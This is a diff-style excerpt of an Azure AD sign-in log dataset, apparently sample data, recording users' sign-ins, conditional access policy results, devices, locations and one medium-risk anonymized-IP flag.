'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:16,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",d0efda67-c5f0-466a-9417-d05e06311300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,d0efda67-c5f0-466a-9417-d05e06311300,SigninLogs,Sucess,33.7984581,-84.38828278
+158,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:57.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5024867d-03af-416b-b2d7-5dfea9189e7e,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",ca1de4aa-1783-40c1-890d-66bc20dc1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,ca1de4aa-1783-40c1-890d-66bc20dc1300,SigninLogs,Sucess,36.6404686,-78.26995087
+159,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:27.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,583835d5-f4a2-4775-846c-8e6edffe772c,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",1dbd81fd-18f7-4582-ba72-d8f2d9511600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,1dbd81fd-18f7-4582-ba72-d8f2d9511600,SigninLogs,Sucess,41.90428925,-85.99833679
+160,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,53:44.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,66e06b60-076f-4a4d-8fc5-d8e54b2caa06,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 13:53,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",414b4bc7-d5ca-4f1d-b1c1-8c28032e4f00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,414b4bc7-d5ca-4f1d-b1c1-8c28032e4f00,SigninLogs,Sucess,32.32146072,34.85319901
+161,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:36.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50058,None,The application tried to perform a silent sign in and the user could not be silently signed in. The application needs to start an interactive flow giving users an option to sign in. Contact app owner.,0,bd16479f-8045-0000-5683-424995b0e98c,Microsoft.aadiam,Microsoft.aadiam,,ee9ea8b3-5b09-4c36-8739-24856720b373,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,[],notApplied,09/04/2020 14:01,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",724252ea-eeaa-47d5-808a-7afeaaf81400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],"{'errorCode': 50058, 'failureReason': 'The application tried to perform a silent sign in and the user could not be silently signed in. The application needs to start an interactive flow giving users an option to sign in. Contact app owner.'}",ee9ea8b3-5b09-4c36-8739-24856720b373,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,724252ea-eeaa-47d5-808a-7afeaaf81400,SigninLogs,Failed,33.7984581,-84.38828278
+162,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:47.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,bd16479f-8045-0000-5683-424995b0e98c,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 14:01,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",724252ea-eeaa-47d5-808a-7afeb3fa1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,724252ea-eeaa-47d5-808a-7afeb3fa1400,SigninLogs,Sucess,33.7984581,-84.38828278
+163,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:10.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8a8d8a14-3461-495b-bd85-0410c2c523ea,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:34,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",8d371308-4e1f-476f-97d6-c0eab6dd0700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,8d371308-4e1f-476f-97d6-c0eab6dd0700,SigninLogs,Sucess,50.6406517,5.572050095
+164,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,45:59.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5509b988-bd2f-4848-84dd-6f93978b1fe9,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Teams Web Client,5e3ce6c0-2b1f-4285-8d4b-75ee78787346,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:45,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",e9cfabe1-d666-446f-aeb7-58172db30700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,low,atRisk,medium,"[
+  ""anonymizedIPAddress""
+]",{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Teams UIS,e9cfabe1-d666-446f-aeb7-58172db30700,SigninLogs,Sucess,34.06555176,-118.2405396
+165,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:43.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,af463770-06a2-4368-9b18-54cc3093d2ce,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 23:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",6052c246-a70b-451d-9677-f5a70ed02800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,6052c246-a70b-451d-9677-f5a70ed02800,SigninLogs,Sucess,36.6404686,-78.26995087
